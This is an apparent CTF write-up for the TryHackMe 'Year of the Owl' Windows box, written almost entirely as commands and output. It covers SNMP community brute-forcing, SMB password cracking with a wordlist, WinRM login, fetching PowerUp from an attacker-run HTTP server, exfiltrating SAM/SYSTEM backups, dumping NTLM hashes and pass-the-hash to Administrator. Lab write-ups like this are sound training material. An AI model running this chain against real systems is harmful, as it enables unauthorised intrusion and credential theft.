CTF Year of the Owl

CTFTryHackMe
, , ,

rustscan

1
rustscan -a 10.10.33.184 --ulimit 5000
1
2
3
4
5
6
7
8
PORT      STATE SERVICE       REASON
80/tcp    open  http          syn-ack
139/tcp   open  netbios-ssn   syn-ack
443/tcp   open  https         syn-ack
445/tcp   open  microsoft-ds  syn-ack
3389/tcp  open  ms-wbt-server syn-ack
5985/tcp  open  wsman         syn-ack
47001/tcp open  winrm         syn-ack

SNMP SCAN

To find the community.

1
onesixtyone 10.10.33.184 -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp-onesixtyone.txt


The community is openview.

https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
This mib is used to get the users.

1
snmpwalk -c openview -v1 10.10.33.184 1.3.6.1.4.1.77.1.2.25


Jareth

smb crack

Now we can crack the smb password with this user.

1
crackmapexec smb 10.10.33.184 -u Jareth -p /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt


sarah

Browse the SMB

1
smbclient -L //10.10.33.184 -U Jareth


There is nothing interesting.

List smb shares

1
python /usr/bin/smbmap.py -R -u "Jareth" -p "sarah" -H 10.10.33.184

evil-winrm

1
evil-winrm -u Jareth -p sarah -i 10.10.131.77

Privesc

We gonna use powerup.ps1.

On linux:

1
python -m http.server 8000

On windows:

1
Invoke-WebRequest -Uri http://10.8.50.167:8000/powerup.ps1 -OutFile powerup.ps1

Checklist:
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation

1
2
3
cd /
cd 'C:$Recycle.Bin'
C:\$Recycle.Bin> dir -force


Inside the directory:

We donwload them.
It was impossible to download them when they was in the recycle bin

1
2
3
4
5
copy sam.bak "C:/Users/Jareth/Documents/sam.bak"
copy system.bak "C:/Users/Jareth/Documents/system.bak"

download sam.bak /tmp/sam.bak
download system.bak /tmp/system.bak


I’m moving them in my working directory.

1
mv /tmp/*.bak .

Dump the hashs

1
secretsdump.py -sam sam.bak -system system.bak LOCAL

Output:

1
2
3
4
5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::

Use the admin hash

1
evil-winrm -u Administrator -H 6bc99ede9edcfecf9662fb0c0ddcfa7a -i 10.10.131.77

Yeah !